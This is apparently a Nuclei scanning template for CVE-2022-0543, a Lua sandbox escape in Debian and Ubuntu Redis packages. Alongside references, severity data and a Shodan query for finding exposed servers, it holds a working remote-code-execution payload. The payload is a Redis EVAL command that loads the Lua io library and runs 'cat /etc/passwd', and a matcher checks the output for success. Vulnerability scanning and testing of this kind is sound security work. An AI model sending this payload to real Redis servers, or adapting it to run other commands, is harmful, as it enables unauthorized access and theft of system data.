id: CVE-2022-0543 info: name: Redis Sandbox Escape - Remote Code Execution author: dwisiswant0 severity: critical description: | This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and compromise of the affected system. remediation: Update to the most recent versions currently available. reference: - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis - https://bugs.debian.org/1005787 - https://www.debian.org/security/2022/dsa-5081 - https://lists.debian.org/debian-security-announce/2022/msg00048.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2022-0543 epss-score: 0.97184 cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:* metadata: vendor: redis max-request: 2 product: redis shodan-query: redis_version tags: cve,cve2022,network,redis,unauth,rce,kev tcp: - host: - "{{Hostname}}" - "tls://{{Hostname}}" port: 6380 inputs: - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" read-size: 64 matchers: - type: regex regex: - "root:.*:0:0:" # digest: 4a0a00473045022100add9594e259ef5ddcc1dcde7f1223746d280feb74ec18532bd8aa1af5c9f765902202a3643153452d8a91ee75c4418e174d765a7e855b2650a325b41962940c36eb7:922c64590222798bb761d5b6d8e72950